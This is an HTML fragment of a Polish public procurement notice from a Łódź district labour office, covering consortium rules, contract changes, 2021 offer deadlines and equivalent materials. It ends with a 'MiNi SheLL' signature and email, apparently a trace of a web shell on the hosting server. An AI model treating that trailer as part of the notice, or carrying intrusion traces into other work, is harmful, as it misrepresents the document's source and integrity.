zał. nr 6 do<br/>SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 16. W przypadku złożenia oferty wspólnej przez dwa lub więcej podmioty gospodarcze<br/>(konsorcja/spółki cywilne) oferta musi spełniać wymagania określone w art. 58 ustawy Prawo<br/>zamówień publicznych, w tym:<br/>16.1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z<br/>art. 58 ust. 2 ustawy Pzp Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postepowaniu o udzielenie zamówienia lub pełnomocnika do reprezentowania ich w<br/>postępowaniu i zawarcia umowy. W związku z powyższym niezbędne jest przedłożenie w<br/>ofercie dokumentu zawierającego pełnomocnictwo w celu ustalenia podmiotu uprawnionego do<br/>występowania w imieniu Wykonawców w sposób umożliwiający identyfikację.<br/>16.2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika jaki zakres rzeczowy wykonania zamówienia realizować<br/>zamierzają poszczególni Wykonawcy.<br/>16.3. W celu wykazania niepodlegania wykluczeniu z postępowania o udzielenie zamówienia<br/>wymagane jest załączenie do oferty oświadczenia i przedłożenia na wezwanie dokumentów dla<br/>każdego konsorcjanta oddzielnie.<br/>16.4. Spełnienie warunków udziału w postępowaniu przez Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia będzie weryfikowane przez Zamawiającego zgodnie z art. 117 ust.<br/>2 i 3ustawy Pzp.<br/>17. W odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego Zamawiający wymaga, aby doświadczenie- w zakresie wykonywanych robót<br/>wykazywali Wykonawcy ubiegający się wspólnie o udzielenie zamówienia łącznie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres i warunki zmian zawartej umowy- kwestie odnoszące się do umowy są uregulowane we<br/>wzorze umowy (Załącznik nr 10 do SWZ) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-31 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP (Elektronicznej Skrzynki Podawczej – nazwa – Powiatowy Urząd Pracy w Łodzi) i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-31 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-29</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Rozwiązania równoważne:<br/>1)Jeżeli Zamawiający w opisie przedmiotu zamówienia wskazał znaki towarowe, patenty lub<br/>pochodzenia, źródła lub szczególny proces, który charakteryzuje produkty lub roboty budowlane<br/>dostarczane przez konkretnego wykonawcę, dopuszcza się zaoferowanie rozwiązań<br/>równoważnych opisanych, pod warunkiem zachowania przez nie takich samych minimalnych<br/>parametrów technicznych, jakościowych oraz funkcjonalnych itp.<br/>2)Wykonawca, który powołuje się na rozwiązania równoważne, jest zobowiązany wykazać, że<br/>oferowane przez niego rozwiązania spełniają wymagania określone przez Zamawiającego. W<br/>takim przypadku, Wykonawca załącza do oferty wykaz rozwiązań równoważnych wraz z ich<br/>opisami lub normami.<br/>3)W przypadku, gdy w opisie przedmiotu zamówienia znajdą się odniesienia do norm, ocen<br/>technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w<br/>art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp, Zamawiający dopuszcza rozwiązania równoważne.<br/>Wszelkie użyte w specyfikacji technicznej i przedmiarze znaki handlowe, towarowe, nazwy<br/>modeli, numery katalogowe służą jedynie do określenia cech technicznych i jakościowych<br/>materiałów a nie są wskazaniem producenta. Zamawiający dopuszcza składanie ofert z<br/>zastosowaniem innych materiałów niż określone w dokumentacji projektowej o nie gorszych<br/>parametrach od zaprojektowanych i jakości potwierdzonej certyfikatem. Użyte materiały winne<br/>być w I gatunku jakościowym i wymiarowym, posiadające odpowiednie dopuszczenia do<br/>stosowania w budownictwie i zapewniające sprawność eksploatacyjną.<br/>Zamawiający informuje, że przedmiar robót Załączony do SWZ<br/>ma charakter dokumentu pomocniczego umożliwiającego Wykonawcom wyliczenie ceny za<br/>roboty budowlane stanowiące przedmiot zamówienia. Zawarte w przedmiarze robót zestawienia<br/>obrazują skalę robót budowlanych i stanowią pomoc w oszacowaniu zamówienia.<br/>Zamawiający nie przewiduje przeprowadzenia przez Wykonawcę wizji lokalnej <br/>lub sprawdzenia przez niego dokumentów niezbędnych do realizacji zamówienia, <br/>o których mowa w art. 131 ust. 2.

Creat By MiNi SheLL
Email: jattceo@gmail.com